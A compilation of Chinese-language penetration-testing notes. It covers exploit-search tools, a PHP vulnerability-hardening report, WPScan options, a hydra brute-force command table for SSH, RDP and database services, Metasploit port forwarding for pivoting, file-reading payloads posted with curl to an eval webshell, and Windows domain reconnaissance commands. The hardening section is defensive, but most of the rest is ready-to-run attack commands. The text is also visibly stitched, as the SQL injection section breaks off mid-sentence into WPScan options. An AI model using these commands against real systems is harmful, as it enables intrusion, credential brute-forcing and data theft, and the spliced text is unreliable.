### getsploit 命令使用说明

getsploit 是一个用于搜索和下载漏洞利用工具的命令行工具。

#### 用法:
getsploit [选项]


#### 选项说明:
1. -h, --help
显示帮助信息并退出。

2. -t, --title
仅搜索漏洞利用的标题(默认会搜索描述和源代码)。

3. -j, --json
将搜索结果以 JSON 格式展示。

4. -m, --mirror
将搜索结果中的漏洞利用文件复制到以查询名称命名的子目录中。

5. -c COUNT, --count=COUNT
限制搜索结果的数量,默认值为 10。

6. -l, --local
在本地数据库中执行搜索,而不是在线搜索。

7. -u, --update
更新 getsploit.db 数据库(会下载到脚本所在路径)。

---

#### 示例命令:
1. 搜索特定漏洞:
   getsploit apache
   

2. 只搜索标题:
   getsploit -t apache
   

3. 将结果保存到本地文件夹:
   getsploit -m apache
   

4. 更新本地漏洞数据库:
   getsploit -u
   


---

#### 关键词
#getsploit #漏洞利用工具 #命令行工具 #渗透测试
漏洞加固报告

## 命令注入
### 漏洞点

代码中使用 system() 函数直接执行拼接的命令,用户输入的内容未经任何过滤或验证,因此可能会导致命令注入漏洞。

### 漏洞代码

<?php
$command = 'ping -c 1 '.$_GET['ip'];
system($command); //system函数特性 执行结果会自动打印
?>


### 漏洞产生的危害

- 攻击者可以通过操控 $_GET['ip'] 参数,注入恶意命令,执行系统命令或绕过限制进行信息泄露、文件删除、植入恶意代码等。
- 可能导致服务器被远程控制,数据泄露,甚至完全控制系统。

### 漏洞产生的原因

- 未对用户输入的 $_GET['ip'] 进行有效的验证和过滤,导致恶意输入直接进入 system() 函数执行。
- 过度依赖命令行执行的方式,未使用更安全的替代方法。

### 修复思路

- 最小化修改**:只需对用户输入进行适当的过滤或限制,而无需大规模重写代码。
- **采用更安全的方式**:使用 `escapeshellarg()` 或 `escapeshellcmd()` 函数对用户输入进行处理,防止命令注入。

### 漏洞修复

```php
<?php
$ip = escapeshellarg($_GET['ip']); // 安全处理用户输入
$command = 'ping -c 1 ' . $ip;
system($command); // 执行安全命令
?>
```

**解释**:

- `escapeshellarg()` 会对用户输入的 IP 地址进行转义,避免特殊字符引发的注入攻击。
- 这样就能保证用户输入不被直接当作命令的一部分执行,同时仍保留原功能。

#命令注入 #PHP安全

## 代码注入
### 漏洞点

代码中使用 `eval()` 函数直接执行用户输入的内容,`$_GET['a']` 作为代码片段传递给 `eval()`,如果未经过过滤,攻击者可以注入任意 PHP 代码。

### 漏洞代码

```php
<?php
eval( 'echo ('.$_GET['a'].');');
?>
```

### 漏洞产生的危害

- 攻击者可以通过注入恶意 PHP 代码来执行任意操作,包括但不限于:读取服务器文件、执行系统命令、修改数据库等。
- `eval()` 是 PHP 中非常危险的函数,它会执行传入的 PHP 代码,如果不对用户输入进行严格验证和过滤,可能导致严重的安全问题。

### 漏洞产生的原因

- 使用了 `eval()` 函数执行动态代码,而输入的数据来自用户的 GET 请求(`$_GET['a']`),没有任何过滤或验证。
- `eval()` 函数将用户的输入当作 PHP 代码执行,这使得攻击者能够控制执行内容。

### 修复思路

- **最小化修改**:只需避免使用 `eval()` 或对其输入进行严格的过滤,避免引入复杂的重构。
- **避免使用危险函数**:尽量避免使用 `eval()`,它在安全性方面存在重大隐患。若必须使用,需对输入进行严格限制。

### 漏洞修复

#### 方法一:避免使用 `eval()`,直接处理用户输入

```php
<?php
$input = htmlspecialchars($_GET['a']); // 安全转义用户输入
echo $input;
?>
```

**解释**:

- 使用 `htmlspecialchars()` 函数来转义用户输入,避免将恶意的代码当作 HTML 输出,防止 XSS 等攻击。
- 这样既能保留原有功能,又能避免执行潜在的恶意代码。

#### 方法二:仅允许特定的安全操作

如果必须执行某些运算或操作,可以使用白名单的方式进行限制,而不是直接执行用户输入的代码。

```php
<?php
$allowed_operations = ['operation1', 'operation2']; // 定义允许的操作
if (in_array($_GET['a'], $allowed_operations)) {
// 安全地执行代码
echo $_GET['a'];
} else {
echo 'Invalid operation';
}
?>
```

**解释**:

- 通过白名单限制用户输入的值,避免执行任何不在允许列表中的操作。

#PHP安全 #eval #代码注入

## 文件包含
### 漏洞点

代码中使用 `include()` 函数引入用户提供的文件路径,且文件路径来源于 `$_GET['page']`,没有对输入进行验证或过滤。这可能导致文件包含漏洞,允许攻击者通过控制输入路径来包含恶意文件。

### 漏洞代码

```php
<?php
$file = $_GET['page'];
include("pages/$file");
?>
```

### 漏洞产生的危害

- 攻击者可以利用此漏洞,通过提供恶意的 `$_GET['page']` 值,包含本地系统文件(如 `/etc/passwd`)或外部远程文件(如通过 URL 引入恶意 PHP 脚本)。
- 可能导致信息泄露、远程代码执行、权限提升等严重安全问题。

### 漏洞产生的原因

- 代码直接使用了来自用户输入的值 (`$_GET['page']`) 来构建文件路径,未对输入进行任何验证或过滤。
- `include()` 函数在没有严格限制输入时,允许攻击者通过路径遍历或远程文件包含等方式利用该漏洞。

### 修复思路

- **最小化修改**:只需对用户输入进行严格验证,限制文件路径的范围,不需要大规模重写代码。
- **验证和清理用户输入**:通过白名单限制用户可以包含的文件,避免路径遍历攻击,并防止远程文件包含(RFI)。

### 漏洞修复

#### 方法一:验证文件路径,限制访问的文件

```php
<?php
$allowed_pages = ['home.php', 'about.php', 'contact.php']; // 定义允许的文件
$file = $_GET['page'];
if (in_array($file, $allowed_pages)) {
include("pages/$file");
} else {
echo 'Invalid page request';
}
?>
```

**解释**:

- 使用白名单来限制用户只能包含指定的文件,避免攻击者输入任意文件路径。
- 通过验证文件名,防止路径遍历或包含恶意文件。

#### 方法二:清理用户输入,防止路径遍历

```php
<?php
$file = basename($_GET['page']); // 获取文件名而不是完整路径
$file = preg_replace('/[^a-zA-Z0-9_-]/', '', $file); // 仅允许字母、数字、下划线和短横线
include("pages/$file.php");
?>
```

**解释**:

- `basename()` 函数将用户提供的路径转化为文件名,防止路径遍历(例如 `../../etc/passwd`)。
- 使用 `preg_replace()` 过滤掉不安全的字符,确保文件名符合预期的格式。

### 总结

- **白名单**:限制允许的页面或文件,提高代码的安全性。
- **路径清理**:使用函数如 `basename()` 和正则过滤来清理用户输入,防止路径遍历攻击。

#文件包含 #PHP安全 #路径遍历 #远程文件包含

## SQL注入

### 漏洞点

该代码存在 SQL 注入漏洞,问题在于用户输入 `$_GET['id']` 和 `$_GET['name']` 被直接拼接到 SQL 查询中,未进行任何过滤或参数化处理。

### 漏洞代码

```php
<?php
include('conn.php'); // 数据库连接省略
$sql = "SELECT id, name FROM users WHERE id=$_GET['id'] AND name='$_GET['name']'";
$result = $mysqli->query($sql);
if ($result->num_rows > 0) {
while($row = $result->fetch_assoc()) {
echo "id: " . $row["id"]. " - Name: " . $row["name"];
}
} else {
echo "没有查询到结果";
}
?>
```

### 漏洞产生的危害

- **信息泄露**:攻击者通过注入恶意 SQL 代码,可以获取数据库中的敏感信息,如用户数据、管理员权限等。
- **数据篡改**:攻击者可以删除、修改数据库中的数据,导致数据丢失或篡改。
- **系统破坏**:通过 SQL 注入,攻击者可能执行危险命令,导致数据库或应用的完整性受到威胁。
- **完全控制**:在某些情况下,攻击者可能利用 SQL 注入漏洞执行系统命令,从而进一步攻击服务器,甚至获取控制权限。

### 漏洞产生的原因

- 代码直接将用户输入(`$_GET['id']` 和 `$_GET['name']`)拼接到 SQL 查询中,缺乏对输入的过滤和处理。
- 由于没有使用安全的参数化查询或预处理语句,攻击者可以通过操控用户输入来修改查询语句的逻辑,从而注入恶意 SQL 代码
        --exclude-content-based REGEXP_OR_STRING  排除与正则表达式匹配的所有响应(不区分大小写),用于枚举过程中
                                                  会检查响应的头部和正文,正则表达式分隔符不需要。
        --plugins-detection MODE                  使用指定模式枚举插件
                                                  默认:passive
                                                  可选模式:mixed, passive, aggressive
        --plugins-version-detection MODE          使用指定模式检查插件版本
                                                  默认:mixed
                                                  可选模式:mixed, passive, aggressive
        --exclude-usernames REGEXP_OR_STRING      排除与正则表达式/字符串匹配的用户名(不区分大小写),正则表达式分隔符不需要。
    -P, --passwords FILE-PATH                     使用密码攻击时的密码列表
                                                  如果未提供 --username/s 选项,将执行用户枚举。
    -U, --usernames LIST                          使用密码攻击时的用户名列表
                                                  示例:'a1', 'a1,a2,a3', '/tmp/a.txt'
        --multicall-max-passwords MAX_PWD         每个请求发送的最大密码数(用于 XMLRPC multicall)
                                                  默认:500
        --password-attack ATTACK                  强制使用指定攻击,而不是自动选择攻击方式
                                                  multicall 仅适用于 WP < 4.4
                                                  可选攻击方式:wp-login, xmlrpc, xmlrpc-multicall
        --login-uri URI                           如果登录页面不同于 /wp-login.php,提供 URI
        --stealthy                                启用隐匿模式:--random-user-agent --detection-mode passive --plugins-version-detection passive


### 总结:
该命令用于扫描 WordPress 网站的安全性,提供了多种选项来进行插件、主题、用户等信息的枚举,支持自定义代理、超时设置等功能。

https://github.com/wpscanteam/wpscan

#WPScan #WordPress安全 #渗透测试 #命令行工具 #插件枚举 GitHub - wpscanteam/wpscan: WPScan WordPress security scanner. Written for security professionals and blog maintainers to test…
### searchsploit 使用方法

searchsploit 是一个非常强大的工具,用于快速在 Exploit-DB 中搜索已知漏洞和利用代码。以下是它的基本使用方法:

#### 1. 基本搜索
你可以通过关键字或软件名称来搜索漏洞:

searchsploit <keyword>

例如,要搜索与 apache 相关的漏洞:

searchsploit apache


#### 2. 搜索并显示详细信息
使用 -v 选项可以显示更详细的漏洞信息:

searchsploit -v <keyword>


#### 3. 搜索特定漏洞类型
可以根据漏洞类型、平台等过滤搜索结果。例如,查找与 Linux 相关的漏洞:

searchsploit -t linux <keyword>


#### 4. 使用正则表达式
searchsploit 支持正则表达式,用于进行更灵活的搜索:

searchsploit -e '<regex>'


#### 5. 更新 Exploit-DB 数据库
使用 -u 选项可以更新本地 Exploit-DB 数据库:

searchsploit -u


#### 6. 输出格式
可以通过 -o 选项指定输出文件,将搜索结果保存到文件:

searchsploit -o result.txt <keyword>


#### 7. 查找 Exploit 文件的路径
每个漏洞都有一个文件路径,可以通过以下命令直接查找漏洞文件:

searchsploit -p <exploit_id>


例如,要查看 ID 为 12345 的漏洞详细信息:

searchsploit -p 12345


### 总结

searchsploit 是一个用于从 Exploit-DB 数据库中快速搜索漏洞和利用代码的命令行工具,支持关键字搜索、类型过滤、正则表达式等功能。

### 关键词
#searchsploit #漏洞 #ExploitDB #渗透测试 #命令行
### 弱口令爆破命令

以下是根据目标 IP 地址 192.168.1.1 和端口指定格式的爆破命令:

| 服务 | 命令 | 说明 |
|-----------------|----------------------------------------------------------------------------------------------|-------------------------------------------|
| SSH | hydra -L 用户名字典.txt -P 密码字典.txt ssh://192.168.1.1 -s 22 | 对目标 IP 192.168.1.1 的 SSH 服务进行爆破(默认端口 22) |
| FTP | hydra -L 用户名字典.txt -P 密码字典.txt ftp://192.168.1.1 -s 21 | 对目标 IP 192.168.1.1 的 FTP 服务进行爆破(默认端口 21) |
| RDP | hydra -l administrator -P 密码字典.txt rdp://192.168.1.1 -s 3389 | 对目标 IP 192.168.1.1 的 RDP 服务进行爆破(默认端口 3389) |
| Telnet | hydra -L 用户字典.txt -P 密码字典.txt telnet://192.168.1.1 -s 23 | 对目标 IP 192.168.1.1 的 Telnet 服务进行爆破(默认端口 23) |
| MSSQL | hydra -l sa -P 密码字典.txt mssql://192.168.1.1 -s 1433 | 对目标 IP 192.168.1.1 的 MSSQL 服务进行爆破(默认端口 1433) |
| MySQL | hydra -L 用户名字典.txt -P 密码字典.txt mysql://192.168.1.1 -s 3306 | 对目标 IP 192.168.1.1 的 MySQL 服务进行爆破(默认端口 3306) |

### 参数说明:
- -L**:指定用户名字典。
-
-P**:指定密码字典。
- -l**:指定单个用户名(例如 `sa`)。
-
-s**:指定目标端口。
- **ssh://**、**ftp://**、**rdp://**、**telnet://**、**mssql://**、**mysql://**:这些前缀用于指定协议类型。

### 提示:
1. 使用 -s 参数可以指定目标服务的端口号,若使用默认端口(如 SSH 为 22、FTP 为 21),可以省略 `-s`。
2. -V 参数显示详细输出,帮助监控爆破进度。

#关键词#弱口令爆破 #hydra #命令格式 #SSH爆破 #FTP爆破 #RDP爆破 #MSSQL爆破 #MySQL爆破
### portfwd 命令用法总结

portfwd 是 Metasploit 中用于设置和管理端口转发的命令。通过该命令,你可以将本地端口流量转发到远程主机或服务,常用于渗透测试中的中继攻击或访问被防火墙保护的内部网络服务。

#### 常用子命令
1. `add`**:添加一个端口转发规则
2.
delete:删除一个端口转发规则
3.
list:列出当前所有端口转发规则
4.
flush:清空所有端口转发规则

#### 选项说明
-
-h:显示帮助信息
-
-i:指定端口转发条目的索引(通过 `list` 命令查看)
-
-l:指定本地端口(监听端口)或本地连接端口
-
-L:指定本地主机(本地 IP 地址)
-
-p:指定远程主机的端口(用于连接)
-
-r:指定远程主机的 IP 地址(连接目标)
-
-R**:指示反向端口转发(将远程端口流量转发到本地)

#### 使用示例

1. **添加端口转发规则**:
将本地 192.168.5.14:445 的流量转发到远程主机 `192.168.80.172:445`:

   portfwd add -L 192.168.5.14 -l 445 -p 445 -r 192.168.80.172
   


2. **列出所有端口转发规则**:
查看当前配置的端口转发规则:

   portfwd list
   


3. **删除指定的端口转发规则**:
假设你想删除 `Index` 为 0 的规则,可以使用:

   portfwd delete -i 0
   


4. **删除所有端口转发规则**:
清空所有转发规则:

   portfwd flush
   


#### 典型应用场景
- **内网渗透**:利用端口转发将攻击机连接到内网服务,例如 SMB、RDP、SSH 等,进行进一步渗透。
- **绕过防火墙**:通过跳板机或代理主机实现对受防火墙保护的内网主机的访问。
- **反向代理**:当目标主机或服务无法直接访问时,可以配置反向端口转发来接入内网。

---

#portfwd #Metasploit #端口转发 #命令总结
### PHP 文件读取方法归纳

以下是您提供的几种 PHP 文件读取方法的整理与归纳,按功能和实现方式分类:

#### 1. 使用 `file_get_contents()`
cmd=echo file_get_contents('flag.php');

- 功能: 读取整个文件的内容并返回字符串。
- 特点: 适合小型文件,直接返回文件内容。
- 优点: 简单直接,易于使用。
- 用途: 读取文本文件或 PHP 文件的内容,不会执行代码。

#### 2. 使用 `highlight_file()`
cmd=echo highlight_file('flag.php', true);

- 功能: 读取文件并以语法高亮显示 PHP 代码。
- 特点: 输出文件内容时会进行 PHP 语法高亮,适合查看 PHP 文件源码。
- 优点: 高亮显示,易于分析 PHP 代码。
- 用途: 展示 PHP 文件的源码,特别适合调试和学习。

#### 3. 使用 `readfile()`
cmd=echo readfile('flag.php');

- 功能: 直接将文件内容输出到浏览器。
- 特点: 不返回文件内容,而是直接输出文件内容。
- 优点: 适合文件内容的快速输出。
- 用途: 输出文件,适合读取并显示文件内容,适用于图片或其他二进制文件。

#### 4. 使用 `fread()` 与 `fopen()`
cmd=echo fread(fopen('flag.php', 'r'), filesize('flag.php'));

- 功能: 打开文件并读取指定字节数,通常配合 filesize() 来读取整个文件。
- 特点: 更加灵活,可以处理大文件和逐块读取。
- 优点: 读取大文件时性能较好。
- 用途: 用于大文件读取和按需读取。

#### 5. 使用 `file()` 与 `implode()`
cmd=echo implode("\n", file('flag.php'));

- 功能: file() 将文件按行读取成数组,`implode()` 将数组内容连接成字符串。
- 特点: 逐行读取文件并输出。
- 优点: 适用于按行处理文件。
- 用途: 适合读取文本文件、配置文件等,并且可以按行处理文件内容。

---

### 总结对比

| 方法 | 描述 | 优点 | 适用场景 |
|---------------------------|---------------------------------------------|-------------------------------------------------|------------------------------------------|
| `file_get_contents()` | 读取整个文件的内容并返回字符串 | 简单、直接,适合读取小文件 | 读取小型文本文件,配置文件等 |
| `highlight_file()` | 读取并高亮显示 PHP 文件的源代码 | 高亮显示 PHP 语法,便于查看源码 | 查看和分析 PHP 源码 |
| `readfile()` | 直接输出文件内容到浏览器 | 适合快速输出文件内容 | 快速输出文件内容,适用于二进制文件 |
| `fread() + `fopen() | 逐块读取文件内容 | 更加灵活,可读取大文件,按需读取文件内容 | 读取大文件或需要逐块读取文件的场景 |
| file() + implode() | 按行读取文件并将内容连接成字符串 | 适合按行处理文件,可以方便地操作文件的每一行 | 读取和处理文本文件,适合逐行分析内容 |

### 用途选择
- 如果需要快速查看文件内容并输出,推荐使用 file_get_contents() 或 `readfile()`。
- 如果文件较大,且希望逐行读取内容,则推荐使用 `file()` 和 `implode()`。
- 如果需要展示 PHP 源代码并进行高亮显示,使用 `highlight_file()` 更为合适。
- 如果处理大文件并且想要逐块读取,使用 `fread() 和 `fopen() 组合方法更为合适。

### 传入方式
这些方法可以通过 POST 请求中的 cmd 参数传递给 @eval($_POST["cmd"]) 来执行。以下是一个示例:

curl -X POST -d "cmd=echo file_get_contents('flag.php');" http://192.168.5.205/shell.php


### 关键词
#PHP #file_get_contents #highlight_file #readfile #fread #fopen #file #implode #命令注入 #源码读取
Windows 内网信息收集命令

| 分类 | 命令 | 用途 |
|--------------|--------------------------------------------|--------------------------------------|
| 网络和接口信息 | ipconfig /all | 显示所有网络接口的详细信息 |
| | ipconfig /displaydns | 显示本地的 DNS 缓存 |
| | netstat -r | 显示路由表 |
| | netstat -bnao | 列出所有活动的端口及连接状态 |
| | netsh firewall show config | 查看防火墙配置 |
| | netsh advfirewall firewall show rule name=all | 显示所有高级防火墙规则 |
| 用户和权限信息 | whoami /all | 列出当前用户的用户名、组名和权限 |
| | net user /domain | 列出域内所有用户 |
| | net accounts /domain | 显示域密码策略 |
| 共享和组信息 | net share | 显示当前的共享文件夹 |
| | net view /domain | 列出所有域名 |
| | net group /domain | 列出域里的组 |
| | net group "domain computers" /domain | 列出域内所有主机 |
| | net group "domain admins" /domain | 列出域管理员 |
| | net group "enterprise admins" /domain | 列出企业管理员组 |
| 系统和进程信息 | systeminfo | 查看系统版本、补丁等详细信息 |
| | wmic | 查看系统信息(如硬件、服务等) |
| | tasklist | 列出所有当前运行的进程 |

#Windows #内网信息收集 #命令分类
 
 
Back to Top